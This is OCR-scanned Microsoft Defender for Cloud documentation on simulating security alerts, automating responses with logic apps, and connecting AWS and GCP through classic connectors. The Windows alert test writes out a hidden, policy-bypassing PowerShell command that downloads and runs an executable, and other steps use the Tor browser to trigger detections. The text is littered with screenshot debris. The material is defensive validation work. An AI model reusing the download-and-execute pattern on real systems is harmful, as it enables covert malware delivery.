a. Go to Start and type cmd. 


b. Right-select Command Prompt and select Run as administrator 


All Apps Documents Email Web 
Best match 
eg Command Prompt 
App 
Apps 
B x86_x64 Cross Tools Command 


Prompt for VS 2019 


x64_x86 Cross Tools Command 
Prompt for VS 2019 


x86 Native Tools Command Prompt 
for VS 2019 


Developer Command Prompt for VS 
2019 


Microsoft Azure Command Prompt - 
v2.9 


x64 Native Tools Command Prompt 
for VS 2019 


Search the web 


p 


comma - See web results 


More v 


Q 


t t 2 dl 


Command Prompt 


Open 

Run as administrator 
Open file location 
Pin to Start 


Pin to taskbar 


Feedback 


2. At the prompt, copy and run the following command: powershell.exe -NoExit - 


ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference 


'silentlycontinue' ; (New-Object 


System.Net .WebClient) .DownloadFile( 'http://127.0.0.1/1.exe', 'C:\\test-MDATP- 


test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' 


3. The Command Prompt window closes automatically. If successful, a new alert 
should appear in Defender for Cloud Alerts blade in 10 minutes. 


4. The message line in the PowerShell box should appear similar to how it's 
presented here: 


PowerShell IS Copy 


powershell.exe -NoExit -ExecutionPolicy Bypass “WindowSt iam 


> 


Alternately, you can also use the EICAR test string to perform this test: Create a text 
file, paste the EICAR line, and save the file as an executable file to your machine's local 


drive. 


O Note 


When reviewing test alerts for Windows, make sure that you have Defender for 
Endpoint running with Real-Time protection enabled. Learn how to validate this 


configuration. 


Simulate alerts on your Azure VMs (Linux) 


After the Microsoft Defender for Endpoint agent is installed on your machine, as part of 
Defender for Servers integration, follow these steps from the machine where you want 
to be the attacked resource of the alert: 


1. Open a Terminal window, copy and run the following command: curl -o 
~/Downloads/eicar.com.txt £ . 

2. The Command Prompt window closes automatically. If successful, a new alert 
should appear in Defender for Cloud Alerts blade in 10 minutes. 


O Note 


When reviewing test alerts for Linux, make sure that you have Defender for 
Endpoint running with Real-Time protection enabled. Learn how to validate this 


configuration. 


Simulate alerts on Kubernetes 


Defender for Containers provides security alerts for both your clusters and underlying 
cluster nodes. Defender for Containers accomplishes this by monitoring both the control 


plane (API server) and the containerized workload. 


You can tell if your alert is related to the control plan or the containerized workload 
based on its prefix. Control plane security alerts have a prefix of K8S_, while security 


alerts for runtime workload in the clusters have a prefix of K8S.NODE_. 


You can simulate alerts for both of the control plane, and workload alerts with the 


following steps. 


Simulate control plane alerts (K8S_ prefix) 
Prerequisites 


e Ensure the Defender for Containers plan is enabled. 
e Arc only - Ensure the Defender extension is installed. 
e EKS or GKE only - Ensure the default audit log collection autoprovisioning options 


are enabled. 
To simulate a Kubernetes control plane security alert: 
1. Run the following command from the cluster: 
Bash 


kubectl get pods --namespace=asc-alerttest -662jf1039n 


You get the following response: No resource found. 
2. Wait 30 minutes. 
3. In the Azure portal, navigate to the Defender for Cloud's security alerts page. 


4. On the relevant Kubernetes cluster, locate the following alert Microsoft Defender 


for Cloud test alert for K8S (not a threat) 


Simulate workload alerts (K8S.NODE_ prefix) 


Prerequisites 


e Ensure the Defender for Containers plan is enabled. 
e Ensure the Defender profile\extension is installed. 


To simulate a a Kubernetes workload security alert: 


1. Create a pod to run a test command on. This pod can be any of the existing pods 


in the cluster, or a new pod. You can create using this sample yaml configuration: 

YAML 
apiVersion: v1 
kind: Pod 
metadata: 

name: mdc-test 
spec: 

containers: 

- name: mdc-test 
image: ubuntu:18.04 


command: ["/bin/sh"] 
args: ["-c", "while true; do echo sleeping; sleep 3600;done"] 


To create the pod run: 


Bash 


kubectl apply -f <path_to_the_yaml_file> 


2. Run the following command from the cluster: 
Bash 
kubectl exec -it mdc-test -- bash 
3. Copy the executable to a separate location and rename it to 


./asc_alerttest_662jf1039n with the following command cp /bin/echo 


./asc_alerttest_662jf1939n. 
4. Execute the file ./asc_alerttest_662jfi039n testing eicar pipe. 
5. Wait 10 minutes. 
6. In the Azure portal, navigate to the Defender for Cloud's security alerts page. 


7. On the relevant AKS cluster, locate the following alert Microsoft Defender for 


Cloud test alert (not a threat). 


You can also learn more about defending your Kubernetes nodes and clusters with 
Microsoft Defender for Containers. 


Simulate alerts for App Service 


You can simulate alerts for resources running on App Service. 


1. Create a new website and wait 24 hours for it to be registered with Defender for 
Cloud, or use an existing web site. 


2. Once the web site is created, access it using the following URL: 


a. Open the app service resource pane and copy the domain for the URL from the 
default domain field. 


f Browse [C] Stop T Restart E Delete ©) Refresh d Download publish profile “) Reset publish profile LU Sharetomobile A? Send us your feedback 


Click here to access Application Insights for monitoring and profiling for your app. 


Essentials 
Resource group (move) 


Status 


b. Copy the website name into the URL: https: //<website 


name>. azurewebsites.net/This_ Will Generate ASO Alert. 


3. An alert is generated within about 1-2 hours. 


Simulate alerts for Storage ATP (Advanced 
Threat Protection) 


1. Navigate to a storage account that has Azure Defender for Storage enabled. 


2. Select the Containers tab in the sidebar. 


Home > Storage accounts > storage 


— i EA 
— storage | Containers * 


© Refresh Æ? Give feedback 


Name 
e 


3. Navigate to an existing container or create a new one. 


4. Upload a file to that container. Avoid uploading any file that may contain sensitive 
data. 


5. Right-select the uploaded file and select Generate SAS. 

6. Select the Generate SAS token and URL button (no need to change any options). 
7. Copy the generated SAS URL. 

8. Open the Tor browser, which you can download beret, 


9. In the Tor browser, navigate to the SAS URL. You should now see and can 


download the file that was uploaded. 


Testing AppServices alerts 


To simulate an app services EICAR alert: 


1. Find the HTTP endpoint of the website either by going into Azure portal blade for 
the App Services website or using the custom DNS entry associated with this 
website. (The default URL endpoint for Azure App Services website has the suffix 
https: //XXXXXXX.azurewebsites.net). The website should be an existing website 
and not one that was created prior to the alert simulation. 

2. Browse to the website URL and add the following fixed suffix: 

/This Will Generate ASE Alert. The URL should look like this: 
https: //XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert. It might take 


some time for the alert to be generated (~1.5 hours). 


Validate Azure Key Vault Threat Detection 


1. If you don't have a Key Vault created yet, make sure to create one. 

2. After finishing creating the Key Vault and the secret, go to a VM that has Internet 
access and download the TOR Browser”. 

3. Install the TOR Browser on your VM. 

4. Once you finished the installation, open your regular browser, sign-in to the Azure 
portal, and access the Key Vault page. Select the highlighted URL and copy the 


address. 


5. Open TOR and paste this URL (you need to authenticate again to access the Azure 
portal). 

6. After finishing access, you can also select the Secrets option in the left pane. 

7. In the TOR Browser, sign out from Azure portal and close the browser. 

8. After some time, Defender for Key Vault will trigger an alert with detailed 
information about this suspicious activity. 


Next steps 


This article introduced you to the alerts validation process. Now that you're familiar with 
this validation, explore the following articles: 


e Validating Azure Key Vault threat detection in Microsoft Defender for Cloud % 

e Managing and responding to security alerts in Microsoft Defender for Cloud - 
Learn how to manage alerts, and respond to security incidents in Defender for 
Cloud. 


e Understanding security alerts in Microsoft Defender for Cloud 


Automate responses to Microsoft 
Defender for Cloud triggers 
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Every security program includes multiple workflows for incident response. These 
processes might include notifying relevant stakeholders, launching a change 
management process, and applying specific remediation steps. Security experts 
recommend that you automate as many steps of those procedures as you can. 
Automation reduces overhead. It can also improve your security by ensuring the process 
steps are done quickly, consistently, and according to your predefined requirements. 


This article describes the workflow automation feature of Microsoft Defender for Cloud. 
This feature can trigger consumption logic apps on security alerts, recommendations, 
and changes to regulatory compliance. For example, you might want Defender for Cloud 
to email a specific user when an alert occurs. You'll also learn how to create logic apps 
using Azure Logic Apps. 


Availability 


Aspect Details 
Release state: General availability (GA) 
Pricing: Free 


Required roles Security admin role or Owner on the resource group 

and Must also have write permissions for the target resource 

permissions: 
To work with Azure Logic Apps workflows, you must also have the following 
Logic Apps roles/permissions: 
- Logic App Operator permissions are required or Logic App read/trigger access 
(this role can't create or edit logic apps; only run existing ones) 
- Logic App Contributor permissions are required for logic app creation and 
modification 
If you want to use Logic Apps connectors, you may need other credentials to 
sign in to their respective services (for example, your Outlook/Teams/Slack 
instances) 


Clouds: © Commercial clouds 
© National (Azure Government, Azure China 21Vianet) 


Create a logic app and define when it should 
automatically run 


1. From Defender for Cloud's sidebar, select Workflow automation. 


Home > Microsoft Defender for Cloud 


ZG Microsoft Defender for Cloud | Workflow automation 
rowing subseintion "ASC DEMC 


+ Add werkfow automation D Relresh Delete © team more AP Guides & Feedback 


Filter by name P Selecte.. Enablem D. Security aler.. 


TL Scope T4 Trigger Type Th Description 


NewDesignTastRecsPradWEU2 


=z ega ge 


ele 


From this page you can create new automation rules, enable, disable, or delete 


existing ones. 


© Note 


A scope refers to the subscription where the workflow automation is 


deployed. 


2. To define a new workflow, select Add workflow automation. The options pane for 


your new automation opens. 


Home > Micrasoft Defender for Cloud Add workflow automation 
ZG Microsoft Defender for Cloud | Workflow automation 
urr ‘ASC DEMO 


Ta Tigger Type 


ASC DEMO 


Here you can enter: 


a. Aname and description for the automation. 


b. The triggers that will initiate this automatic workflow. For example, you might 
want your logic app to run when a security alert that contains "SQL" is 


generated. 
© Note 


If your trigger is a recommendation that has "sub-recommendations", for 
example Vulnerability assessment findings on your SQL databases should 
be remediated, the logic app will not trigger for every new security finding; 
only when the status of the parent recommendation changes. 


c. The consumption logic app that will run when your trigger conditions are met. 


3. From the Actions section, select visit the Logic Apps page to begin the logic app 
creation process. 


Alert severity * 


| All severities selected Vv 


Actions 
Configure the Logic App that will be triggered 
Choose an existing Logic App of visit the Logic Apps pageffo create a new one 
Show Logic App instances from the following subscriptions * 
ASC DEMO Vv 


Logic App name © 
Select a logic app Vv 
Refresh 


You'll be taken to Azure Logic Apps. 


4. Select (+) Add. 


Home > Logik apps 


Create Logic App 


Basics Hosting Monitorning Tags Review + creste 


Project Details 


Select a subscription to manage deployed resources and costs. Lie resource groups like folders ta ceganize ard manage 
31 your resour 
S ubscriptice © 

R ¢ Group * 


iestance Details 


Git App name * 


iaia rei 


Publids © @) Worltiow LA Docker Container 
GO Central 
@ hodn p leert reg < p 
erce lr 
Phn 
The pian type you choose dictates how your app scales, what features are enabled, and how £ is pncod. Leann more 


Plan type s5 applications, with 
uch a 
OO Man (Central U (New) ABES E 
reste new 
Sku and size * Workflow Standard WS1 
2 chal ACU, 3.5 GB memor, 
Zone redundancy 


An App Service plan can De deployed as a zone redundant service im the regions thet support it. The & a deployment 
time only decision. You can't make an App Service plan rome redundant after it has been deployed Learn more 


Zone redundancy ind the aops in È wil be zone 


vice plan instance count wil be three, 


d the apps in it wil not be zone 
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a 
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5. Fill out all required fields and select Review + Create. 


The message Deployment is in progress appears. Wait for the deployment 
complete notification to appear and select Go to resource from the notification. 


6. Review the information you entered and select Create. 


In your new logic app, you can choose from built-in, predefined templates from 
the security category. Or you can define a custom flow of events to occur when 
this process is triggered. 


Ọ Tip 


Sometimes in a logic app, parameters are included in the connector as part of 
a string and not in their own field. For an example of how to extract 


parameters, see step #14 of Working with logic app parameters while 
building Microsoft Defender for Cloud workflow automations Z . 


The logic app designer supports the following Defender for Cloud triggers: 


e When a Microsoft Defender for Cloud Recommendation is created or 
triggered - If your logic app relies on a recommendation that gets 
deprecated or replaced, your automation will stop working and you'll need to 
update the trigger. To track changes to recommendations, use the release 
notes. 


e When a Defender for Cloud Alert is created or triggered - You can 
customize the trigger so that it relates only to alerts with the severity levels 
that interest you. 


e When a Defender for Cloud regulatory compliance assessment is created or 
triggered - Trigger automations based on updates to regulatory compliance 


assessments. 


O Note 


If you are using the legacy trigger "When a response to a Microsoft Defender 
for Cloud alert is triggered", your logic apps will not be launched by the 
Workflow Automation feature. Instead, use either of the triggers mentioned 
above. 


OEE 
e EO 


7. After you've defined your logic app, return to the workflow automation definition 
pane ("Add workflow automation"). Select Refresh to ensure your new logic app is 


available for selection. 


Actions 
Configure the Logic App that will be triggered. 
Choose an existing Logic App or visit the Logic Apps page to create a new one 


Show Logic App instances from the following subscriptions * 


| ASC DEMO v 


Logic App name © 


+ 


8. Select your logic app and save the automation. The logic app dropdown only 
shows those with supporting Defender for Cloud connectors mentioned above. 


Manually trigger a logic app 


You can also run logic apps manually when viewing any security alert or 


recommendation. 


To manually run a logic app, open an alert, or a recommendation and select Trigger 


logic app: 


= Microsoft Azure D Search resources, services, and docs (G+/) Se fh as? O 


Home > Microsoft Defender for Cloud- Security alerts > PREVIEW - Role binding to the cluster-admin role detected > PREVIEW - Role binding to the cluster-admin role detected 


PREVIEW - Role binding to the cluster-admin role detected x 


ASC-IGNITE-DEMO 


KO Learn more 


/N General information 


Kubernetes audit log analysis detected a new binding to the cluster-admin role 
which gives administrator privileges. 


IEE Unnecessary administrator privileges might cause privilege escalation in the cluster. 

ACTIVITY TIME Tuesday, October 29, 2019, 3:06:26 PM 

SEVERITY @ Low 

STATE Active 

ATTACKED RESOURCE ASC-IGNITE-DEMO 

SUBSCRIPTION ASC DEMO (214bd26) 

DETECTED BY EE Microsoft 

ACTION TAKEN Natartad = 


Was this useful? © Yes © No 


ee 


| Trigger Logic App 


Configure workflow automation at scale using 
the supplied policies 


Automating your organization's monitoring and incident response processes can greatly 
improve the time it takes to investigate and mitigate security incidents. 


To deploy your automation configurations across your organization, use the supplied 
Azure Policy 'DeploylfNotExist' policies described below to create and configure 


workflow automation procedures. 
Get started with workflow automation templates £. 
To implement these policies: 


1. From the table below, select the policy you want to apply: 


Goal Policy Policy ID 
Workflow automation for Deploy Workflow Automation for £1525828-9a90- 
security alerts Microsoft Defender for Cloud alerts 7 Afcf-be48- 


268cdd02361e 


Goal Policy Policy ID 


Workflow automation for Deploy Workflow Automation for 73d6ab6c-2475- 
security Microsoft Defender for Cloud 4850-afd6- 
recommendations recommendations E 43795f3492ef 
Workflow automation for Deploy Workflow Automation for 509122b9-ddd9- 
regulatory compliance Microsoft Defender for Cloud regulatory 47ba-a5f1- 
changes compliance 7 d0dac20be63c 


Q Tip 


You can also find these by searching Azure Policy: 


a. Open Azure Policy. 


Microsoft Azure Ø policy x 


Dashboard > Microsoft Defen Services 


4 ‘ po 
A Ea EZ i 


| & Search (Ctri+/) E service endpoint policies 


EŒ Firewall Policies 


b. From the Azure Policy menu, select Definitions and search for them by 


name. 


2. From the relevant Azure Policy page, select Assign. 


Deploy Workflow Automation for Microsoft Defender for Cloud recommendations 


Policy definition 
t def D Duplicate definition t t GO Export definition 
A Essentials 
Name : Deploy Workflow Automation for Microsoft Defender for Cloud recommendations 
Description : Enable automation of Microsoft Defender for Cloud recommendations. This policy deploys a workflow automation with your conditions and triggers on the assigned scope. To deploy this po... 


Available Effects : DeploylfNotExists 


Category : Security Center 


Definition Assignments (0) Parameters 


£ 
"properties": { 
"displayName": "Deploy Workflow Automation for Microsoft Defender for Cloud recommendations", 
“policyType": "BuiltIn", 
"mode": “All”, 
“description”: "Enable automation of Microsoft Defender for Cloud recommendations. This policy deploys a workflow automation with your conditions 
"metadata": { 
"version": "5.0.0", 
"category": "Security Center" 


b 


Seg SO wne 


OO 


3. Open each tab and set the parameters as desired: 
a. In the Basics tab, set the scope for the policy. To use centralized management, 
assign the policy to the Management Group containing the subscriptions that 

will use the workflow automation configuration. 


b. In the Parameters tab, enter the required information. 


Deploy Workflow Automation for Microsoft Defender for Cloud recommendations 


Assign policy 


Basics Parameters Remediation Non-compliance messages Review + create 


Search by para... | @ Only show parameters that need input or review 


Automation name * © 


Resource group name * © 


Resource group location * © 


Logic App* © 


Logic app trigger* © 


a. (Optional), Apply this assignment to an existing subscription in the Remediation 
tab and select the option to create a remediation task. 


4. Review the summary page and select Create. 


Data types schemas 


To view the raw event schemas of the security alerts or recommendations events passed 
to the logic app, visit the Workflow automation data types schemas £ . This can be useful 
in cases where you aren't using Defender for Cloud's built-in Logic Apps connectors 
mentioned above, but instead are using the generic HTTP connector - you could use the 
event JSON schema to manually parse it as you see fit. 


Next steps 


In this article, you learned about creating logic apps, automating their execution in 
Defender for Cloud, and running them manually. For more information, see the 
following documentation: 


e Use workflow automation to automate a security response 
e Security recommendations in Microsoft Defender for Cloud 
e Security alerts in Microsoft Defender for Cloud 

e Workflow automation data types schemas 7 

e Check out common questions about Defender for Cloud. 


Manage classic cloud connectors 
(retired) 


Article e 07/12/2023 


The retired classic cloud connector requires configuration in your Google Cloud Platform 
(GCP) project or Amazon Web Services (AWS) account to create a user that Microsoft 
Defender for Cloud can use to connect to your GCP project or AWS environment. The 
classic connector is available only to customers who previously used it to connect GCP 
projects or AWS environments. 


To connect a GCP project or an AWS account, you should use the native connector 
available in Defender for Cloud. 


Connect your AWS account by using the classic 
connector 


Prerequisites 
To complete the procedures for connecting an AWS account, you need: 


e A Microsoft Azure subscription. If you don't have an Azure subscription, you can 
sign up for a free one”. 


e Microsoft Defender for Cloud enabled on your Azure subscription. 
e Access to an AWS account. 


e Owner permission on the relevant Azure subscription. A Contributor can also 
connect an AWS account if an Owner provides the service principal details. 


Set up AWS Security Hub 


To view security recommendations for multiple regions, repeat the following steps for 


each relevant region. 


If you're using an AWS management account, repeat the following steps to configure 
the management account and all connected member accounts across all relevant 


regions. 


1. Enable AWS Config Z. 


2. Enable AWS Security Hub @. 
3. Verify that data is flowing to Security Hub. When you first enable Security Hub, the 


data might take several hours to become available. 


Set up authentication for Defender for Cloud in AWS 


There are two ways to allow Defender for Cloud to authenticate to AWS: 


e Create an identity and access management (IAM) role for Defender for Cloud: The 


more secure and recommended method. 


e Create an AWS user for Defender for Cloud: A less secure option if you don't have 
IAM enabled. 


Create an IAM role for Defender for Cloud 


1. From your Amazon Web Services console, under Security, Identity & Compliance, 
select IAM. 


AWS services 


v All services 


@ 


Compute 

EC2 

EC2 Container Serce 
Lightsai 

Elastic Beanstalk 
Lambda 

Batch 


Storage 

$3 

EFS 

Glacier 

Storage Gateway 


Database 
ROS 
DynamooB 
ElastiCache 
Redshift 


7 Networking & Content 


Delivery 

VPC 
CloudFront 
Direct Connect 
Route 53 


Migration 


Application Discovery Service 


DMS 
Server Migration 
Snowball 


EÊ Developer Tools 


CodeCommit 
CodeBuiki 
CodeDepioy 
CodePipeline 


E Management Tools 


Cioudwaich 
CloudFormation 
CloudTrail 

Config 

OpsWorks 

Service Catalog 
Trusted Advisor 
Managed Services 


Security, Identity & 
Compliance 

IAM 

Inspector 

Certificate Manager 
Directory Service 
WAF & Shield 
Compliance Reports 


aff) Analytics 


Athena 

EMR 

CtoudSearch 
Elasticsearch Service 
Kinesis 

Data Pipeline 
QuickSight 


© Artificial intelligence 


Lex 

Polly 

Rekognition 
Machine Learning 


2. Select Roles > Create role. 


Re 


E 


Internet of Things 
AWS WoT 


Game Development 
GameLift 


Mobile Services 
Mobile Hub 
Cognito 

Device Farm 
Mobile Analytics 
Pinpoint 


Application Services 
Step Functions 

SWF 

API Gateway 

Elastic Transcoder 


Messaging 
sas 
SNS 
SES 


Business Productivity 
WorkDocs 

WorkMail 

Amazon Chime 


Desktop & App Streaming 


WorkSpaces 
AppStream 2.0 


Featured next steps 


E Manage your costs 
Get realtime billing alerts based on your cost and 


usage budgets. Start now 


4 Get best practices 
Use AWS Trusted Advisor for security, performance 
cost and availability best practices. Start now 


What's new? 


Announcing AWS Batch 


Now generally available, AWS Batch enables developers 
scientists, and engineers to process large-scale batch jobs with 


ease. Leam more 


Announcing Amazon Lightsail 
See how this new senice allows you to launch and manage your 


VPS with AWS for a low, predictable price. Learn more 


See all 


AWS Marketplace 


Discover, procure, and deploy popular software products that run 
on AWS. 


Have feedback? 


Submit feedback to tell us about your experience with the AWS 
Management Console 


3. Select Another AWS account. 
4. Enter the following details: 


e For Account ID, enter the Microsoft account ID 158177204117, as shown on 
the AWS connector page in Defender for Cloud. 

e Select Require External ID. 

e For External ID, enter the subscription ID, as shown on the AWS connector 


page in Defender for Cloud. 
5. Select Next. 


6. In the Attach permission policies section, select the following AWS managed 
policies £: 


e SecurityAudit (arn:aws:iam::aws:policy/SecurityAudit ) 

e AmazonSSMAutomationRole (arn:aws:iam: :aws:policy/service- 
role/AmazonSSMAutomationRole ) 

e AWSSecurityHubReadOnlyAccess 


(arn:aws:iam: :aws:policy/AWSSecurityHubReadOnlyAccess ) 
7. Optionally, add tags. Adding tags to the user doesn't affect the connection. 
8. Select Next. 
9. In The Roles list, choose the role that you created. 


10. Save the Amazon Resource Name (ARN) for later. 


Create an AWS user for Defender for Cloud 
1. Open the Users tab and select Add user. 


2. In the Details step, enter a username for Defender for Cloud. Select Programmatic 


access for the AWS access type. 
3. Select Next: Permissions. 
4. Select Attach existing policies directly and apply the following policies: 


e SecurityAudit 
© AmazonSSMAutomationRole 


© AWSSecurityHubReadOnlyAccess 


5. Select Next: Tags. Optionally, add tags. Adding tags to the user doesn't affect the 
connection. 


6. Select Review. 


7. Save the automatically generated Access key ID and Secret access key CSV files for 
later. 


8. Review the summary, and then select Create user. 


Configure the SSM Agent 


AWS Systems Manager (SSM) is required for automating tasks across your AWS 
resources. If your EC2 instances don't have the SSM Agent, follow the relevant 
instructions from Amazon: 


e Installing and Configuring SSM Agent on Windows Instances E 


e Installing and Configuring SSM Agent on Amazon EC2 Linux Instances % 


Complete the Azure Arc prerequisites 
1. Make sure the appropriate Azure resource providers are registered: 


e Microsoft.HybridCompute 


e Microsoft.GuestConfiguration 


2. As an Owner on the subscription that you want to use for onboarding, create a 
service principal for Azure Arc onboarding, as described in Create a service 
principal for onboarding at scale. 


Connect AWS to Defender for Cloud 


1. From the Defender for Cloud menu, open Environment settings. Then select the 
option to switch back to the classic connectors experience. 


ili Microsoft Defender for Cloud | Environment settings 


I: Showing 75 subscriptions 

P Search (Ctri+/ | « ++ Add environment v OO Refresh 
General 5 75 5 7 

D overview Azure subscriptions AWS accounts 


edita @ welcome to the new multi-cloud account management page 


z= Recommendations 


D Security alerts | DO Search by name 


fa Inventory 


Name Ty Total resources Ty 
Workbooks 
a WV © Azure 
GO Community 
> (©) argo 5117 
GO Diagnose and solve problems 
B p > () 4b2462 905 


Cloud Security bai & AWS (preview) 


© Secure Score E AWSNinjaconnector 254 
E Regulatory compliance ES securityConnector 1573 
Q Workload protections > Ea MasterAwsProd 40 
=% Firewall Manager E daasdf 1 

E kedamari 1 


Management 


ili Environment settings @ 


E Security solutions 


ZA Workflow automation 


2. Select Add AWS account. 


To switch back to the classic cloud connectors experience, click here. 


Defender coverage Ty Standards Ty 
A Limited permissions 
A Limited permissions 


3/3 plans 


a AWS CIS 1,2.0 (preview), AWS Foundational ... 


3/3 plans AWS CIS 1.2.0 (preview), AWS Foundational ... 
AWS CIS 1.2.0 (preview), AWS Foundational ... 
AWS CIS 1.2.0 (preview), AWS Foundational ... 


AWS Foundational Security Best Practices (p... 


A 


@ Microsoft Defender for Cloud | Multi cloud connectors & 


Showing 41 subscriptions 


-+ Add GCP account ©) Refresh 


Display name 


Environment 


Account / Org ID 


Subscription 


3. Configure the options on the AWS authentication tab: 


a. For Display name, enter a name for the connector. 


b. For Subscription, confirm that the value is correct. It's the subscription that 


includes the connector and AWS Security Hub recommendations. 


c. Depending on the authentication option that you chose when you set up 


authentication for Defender for Cloud in AWS, take one of the following actions: 


e For Authentication method, select Assume Role. Then, for AWS role ARN, 


paste the ARN that you got when you created an IAM role for Defender 


for Cloud. 


Dashboard > Security Center 


Connect AWS account & 


AWS authentication Azure Arc configuration Review + create 


Connect AWS account to Security Center to enable visibility and protection to be managed centrally. This will allow automatic and 
continuous onboarding of AWS EC2 instances with Azure Arc and integrate Security Hub recommendations. 


Basics 


Display name * | 


Subscription * © Select subscription KA 


AWS authentication 


Authentication method © Assume role O Credentials 


Microsoft account ID | 158177204117 D | 


External ID (Subscription ID) 


AWS role ARN * 


e For Authentication method, select Credentials. Then, in the relevant 
boxes, paste the access key and secret key from the CSV files that you 
saved when you created an AWS user for Defender for Cloud. 


4. Select Next. 
5. Configure the options on the Azure Arc Configuration tab. 


Defender for Cloud discovers the EC2 instances in the connected AWS account and 
uses SSM to onboard them to Azure Arc. For the list of supported operating 
systems, see What operating systems for my EC2 instances are supported? in the 


common questions. 


a. For Resource Group and Azure Region, select the resource group and region 
that the discovered AWS EC2s will be onboarded to in the selected subscription. 


b. Enter the Service Principal ID and Service Principal Client Secret values for 
Azure Arc, as described in Create a service principal for onboarding at scale. 


c. If the machine is connecting to the internet via proxy server, specify the proxy 
server IP address, or the name and port number that the machine uses to 
communicate with the proxy server. Enter the value in the format 


http: //<proxyURL>:<proxyport>. 
d. Select Review + create. 


6. Review the summary information. 


The Tags section lists all Azure tags that are automatically created for each 
onboarded EC2 instance. Each tag has its own relevant details, so you can easily 
recognize it in Azure. Learn more about Azure tags in Use tags to organize your 


Azure resources and management hierarchy. 


Confirm the connection 
After you successfully create the connector and properly configure AWS Security Hub: 


e Defender for Cloud scans the environment for AWS EC2 instances and onboards 
them to Azure Arc. You can then install the Log Analytics agent and get threat 


protection and security recommendations. 


e The Defender for Cloud service scans for new AWS EC2 instances every 6 hours 
and onboards them according to the configuration. 


e The AWS CIS standard appears in the regulatory compliance dashboard in 
Defender for Cloud. 


e |f a Security Hub policy is enabled, recommendations appear in the Defender for 
Cloud portal and the regulatory compliance dashboard 5 to 10 minutes after 
onboarding finishes. 


y= Microsoft Defender for Cloud | Recommendations i x 
ETT showing subscription ‘Dev2 

| P Search (Ctrl+/) < d Download CSV report Gi Guides & Feedback 

gea | Ø Search recomm | Control status : All Recommendation status : All Recommendation maturity : All Severity : All Sort by max score V 


© overview | Collapse all Resource type : All Response actions : All Contains exemptions : All Environment : AWS 
@ Getting started 
$= Recommendations Controls Max score Current Score Potential score increase Unhealthy resources 
© security alerts {v Enable MFA @ 10 10 IDI + 0% COpoints) None 
© inventory A Hardware MFA should be enabled for the "root" a... II 3 of 3 AWS acc... 
@ workbooks de Restrict unauthorized network access 4 3.85 BOGE + 0% (0.15 points) 1 of 197 resources 
OO Community A VPC's default security group should restricts all tr... E 51 of 51 AWS Ea 
@ Diagnose and solve problems A Amazon EC2 should be configured to use VPC en... E 51 of 51 AWS Ea 
A Security groups should only allow unrestricted inc... © E None 
Cloud Security 
A Security groups should not allow unrestricted arc... © E None 


© secure Score 


SZ 

8 

£ f 
5 8 
® 2 
7 > 
E = 
= © 
> a 


v Manage access and permissions @ Security groups should not allow unrestricted access to ports with high risk BAO 
@ Regulatory compliance 
D Ensure credentials unused for 90 days or greater a... © mn None 
Q workload protections 
D Ensure access keys are rotated every 90 days or less © KO None 
€% Firewall Manager 
D Root account access key shouldn't exist © i None 
Management E 
A IAM policies should be attached only to groups or... Sa 1 of 5 AWS acc- 
I Environment settings 
io g A Do not setup access keys during initial user setup... © Ga None 
E Security solutions 
d A IAM policies that allow full "*:*" administrative pri... © Hi None 
Workflow automation 
% A Lambda functions should restrict public access @ E None 
A Amazon S3 permissions granted to other AWS acc... © D None 


Remove classic AWS connectors 


To remove any connectors that you created by using the classic connectors experience: 


1. Sign in to the Azure portal £. 
2. Go to Defender for Cloud > Environment settings. 


3. Select the option to switch back to the classic connectors experience. 


ill Microsoft Defender for Cloud | Environment settings 


Showing 75 subscriptions 


Ee 


©) Refresh 


A Search (Ctrl+/ | 2 + Add environment 
General & 7 5 e 7 
D overview Azure subscriptions AWS accounts 


@ Getting started 
= Recommendations 
© security alerts 


ta Inventory 


fi) Welcome to the new multi-cloud account management page 


| P Search by name 


To switch back to the classic cloud connectors experience, click here. 


Name Ty Total resources Ty Defender coverage Ty Standards Ty 

@ workbooks VSR 

O any > ) 72f988 5117 A Limited permissions 

Spike > *) 4b2462 905 A Limited permissions 

Cloud Security WV O AWS (preview) 

© Secure Score ES AWSNinjaConnector 254 3/3 plans AWS CIS 1.2.0 (preview), AWS Foundational ... 

B Regulatory compliance E securityConnector 1573 3/3 plans AWS CIS 1.2.0 (preview), AWS Foundational ... 

D workload protections > Ba MasterAwsProd 40 13 plans AWS CIS 1.2.0 (preview), AWS Foundational .. 

E, Firewall Manager Bi daasdt 1 3/3 plans AWS CIS 1.2.0 (preview), AWS Foundational .. 

Management EZ kedamari 1 3/3 plans AWS Foundational Security Best Practices (p.. 
Pre 

E Security solutions Q 

TS Workflow automation 


4. For each connector, select the ellipsis (...) button at the end of the row, and then 
select Delete. 


5. On AWS, delete the ARN role or the credentials created for the integration. 


Connect your GCP project by using the classic 
connector 


Create a connector for every organization that you want to monitor from Defender for 
Cloud. 


When you're connecting GCP projects to specific Azure subscriptions, consider the 
Google Cloud resource hierarchy” and these guidelines: 


e You can connect your GCP projects to Defender for Cloud at the organization level. 

e You can connect multiple organizations to one Azure subscription. 

e You can connect multiple organizations to multiple Azure subscriptions. 

e When you connect an organization, all projects within that organization are added 
to Defender for Cloud. 


Prerequisites 
To complete the procedures for connecting a GCP project, you need: 


e A Microsoft Azure subscription. If you don't have an Azure subscription, you can 
sign up for a free one”. 


e Microsoft Defender for Cloud enabled on your Azure subscription. 
e Access to a GCP project. 
e The Owner or Contributor role on the relevant Azure subscription. 


You can learn more about Defender for Cloud pricing on the pricing page”. 


Set up GCP Security Command Center with Security 
Health Analytics 


For all the GCP projects in your organization, you must: 


1. Set up GCP Security Command Center by using these instructions from the GCP 
documentation Z. 


2. Enable Security Health Analytics by using these instructions from the GCP 
documentation £. 


3. Verify that data is flowing to Security Command Center. 


The instructions for connecting your GCP environment for security configuration follow 
Google's recommendations for consuming security configuration recommendations. The 
integration applies Google Security Command Center and consumes extra resources 
that might affect your billing. 


When you first enable Security Health Analytics, the data might take several hours to 
become available. 


Enable the GCP Security Command Center API 


1. Go to Google's Cloud Console API Library. 


2. Select each project in the organization that you want to connect to Microsoft 
Defender for Cloud. 


3. Find and select Security Command Center API. 


4. On the API's page, select ENABLE. 


Learn more about the Security Command Center API Z. 


Create a dedicated service account for the security 
configuration integration 


1. On the GCP console, select a project from the organization in which you're 
creating the required service account. 
© Note 


When you add this service account at the organization level, it will be used to 
access the data that Security Command Center gathers from all of the other 
enabled projects in the organization. 

2. In the IAM & admin section of the left menu, select Service accounts. 

3. Select CREATE SERVICE ACCOUNT. 

4. Enter an account name, and then select Create. 

